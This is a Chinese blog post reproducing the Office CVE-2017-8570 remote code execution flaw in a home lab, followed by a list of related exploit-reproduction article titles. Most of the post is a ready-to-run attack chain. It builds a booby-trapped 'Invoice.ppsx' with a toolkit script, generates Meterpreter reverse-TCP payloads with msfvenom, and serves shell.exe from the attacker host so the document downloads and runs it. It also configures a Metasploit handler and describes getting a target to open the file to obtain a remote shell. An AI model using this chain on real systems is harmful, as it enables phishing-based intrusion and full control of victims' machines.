Office CVE-2017-8570远程代码执行漏洞复现
2018-01-12 14:51
1041 查看
漏洞影响版本
很尴尬,此页无图Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)<
4000
/div>
Microsoft Office 2016 (64-bit edition)
复现环境:
攻击机:系统:kallinux 32位 IP:192.168.1.194 metasploit
目标机:系统:window7旗舰版 IP:192.168.1.133 Microsoft Office 2013
1、生成恶意文件:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.194/logo.doc
1、这里的IP是攻击机IP
2、Invoice.ppsx为生成的恶意文件
3、这里可能会报一个错误:
IOError: [Errno 2] No such file or directory: 'template/template.ppsx'
这里郁闷了很久,各种查资料,才知道这里是文件中的一个路径有问题!
在文件cve-2017-8570_toolkit.py中有一个文件路径需要修改:
修改后为此文件(template.ppsx)所在路径:
如我现在的文件为/root/Office8570-master/文件夹下,所以修改成:
接下来执行第一步生成恶意文件命令就不会报错了!
生成的恶意文件:
2、生成反弹shell文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.194 LPORT=6666 -f exe > shell.exe
设置反弹shell的ip192.168.1.194,和监听端口6666
命令执行成功:
生成的shell文件
当然了,如果目标机是64位机器那么需要执行不一样的命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell64.exe
命令执行成功
生成shell64文件
3、监听会话(来自ppsx执行反弹shell)
执行命令(32位目标机):
python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.194/shell.exe -l shell.exe
过脚本在80端口监听,等待接收ppsx请求并下载执行的反弹木马
命令执行成功监听服务启动:
接下来进入Metasploit,新建一个Kali 192.168.1.194的连接,设置相关参数,接受返回的Shell:
Msfconsole
msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.1.194
msf > set LPORT 6666
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit
同样,这里攻击64位操作系统的时候,需执行如下命令(这里我没有执行):
msf > set pauload windows/x64/meterpreter/reverse_tcp
4、漏洞执行
最后将我们生成好的恶意文件发送给目标机,并让目标机打开文件。我这里是kalinux运行在虚拟机中,所以讲恶意文件直接拖到win7中,然后执行文件就行了。
文件运行(如果将文件发给别人,必须要让别人打开此文件,否则不可成功,另外图没有截好T_T)
Shell反弹显示get到了目标机
然后再meterpreter中可以直接执行ls命令,如下:
可见win7桌面上的文件:
我们还可以直接执行shell命令,那么就可以直接执行win7下的DOS命令了:
相关文章推荐
- Office CVE-2017-8570 远程代码执行漏洞复现
- Office CVE-2017-8570远程代码执行漏洞复现
- iis6.0远程代码执行漏洞复现(CVE-2017-7269)
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
- Palo Alto防火墙远程代码执行漏洞复现
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
- Apache Tomcat CVE-2017-12615远程代码执行漏洞分析
- WebView远程代码执行漏洞学习并复现
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- CVE-2017-8464远程命令执行漏洞复现
- 测试Tomcat CVE-2017-12615 远程代码执行漏洞
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- 【漏洞公告】CVE-2017-8464 :Microsoft Windows LNK 远程代码执行漏洞
- Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
- IIS 6.0远程代码执行漏洞(CVE-2017-7269)
- Tomcat/7.0.81 远程代码执行漏洞复现